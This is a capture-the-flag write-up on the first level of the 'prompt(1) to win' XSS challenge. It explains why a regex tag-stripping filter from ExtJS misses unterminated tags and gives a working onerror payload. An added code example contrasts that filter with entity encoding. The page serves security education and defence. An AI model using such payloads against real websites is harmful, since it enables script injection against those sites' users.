
【prompt(1) to win】 Level 1 - tags stripping

 2 years ago
source link: https://exp-blog.com/safe/ctf/prompt/level-1-tags-stripping/

【prompt(1) to win】 Level 1



```javascript
function escape(input) {
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, '');

    return '<article>' + input + '</article>';
}
```

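Look closely at the regular expression: it strips every tag that matches `<tag></tag>`.

So the filter can be bypassed by not building a complete tag and injecting only through an attribute, for example with this payload:

`<img src=0 onerror=prompt(1) ` (note the trailing space at the end, which terminates the unquoted attribute value before the appended `</article>`)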
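The filter above beside an output-encoding alternative, as an added example that is not part of the original write-up. The names `escapeStrip`, `escapeEncode` and `leaksMarkup` are chosen here, and the encoding variant assumes the input is meant to be displayed as plain text only.

```javascript
// Added example (not from the original article or from ExtJS).
const stripTagsRE = /<\/?[^>]+>/gi;

// The challenge's filter: it only removes sequences that already contain
// a closing '>', so an unterminated tag passes through untouched.
function escapeStrip(input) {
    return '<article>' + String(input).replace(stripTagsRE, '') + '</article>';
}

// Hardened variant (assumption: input is text, never markup).
// Encoding every HTML metacharacter leaves nothing for the parser to
// interpret, whether or not the tag is complete.
const ENTITIES = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};
function escapeEncode(input) {
    const text = String(input).replace(/[&<>"']/g, ch => ENTITIES[ch]);
    return '<article>' + text + '</article>';
}

// Defensive check: does a raw '<' from the input survive inside the wrapper?
function leaksMarkup(render, input) {
    const out = render(input);
    const body = out.slice('<article>'.length, out.length - '</article>'.length);
    return body.includes('<');
}

// Inputs: the payload shown on this page, and a constructed complete tag.
const payload = '<img src=0 onerror=prompt(1) ';
const complete = '<b>bold</b> text';

for (const [name, render] of [['strip', escapeStrip], ['encode', escapeEncode]]) {
    for (const input of [complete, payload]) {
        console.log(name, JSON.stringify(render(input)),
                    'raw markup survives:', leaksMarkup(render, input));
    }
}
```

Running it shows the stripping filter removing the complete tag but returning the unterminated one unchanged, while the encoding variant neutralises both.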


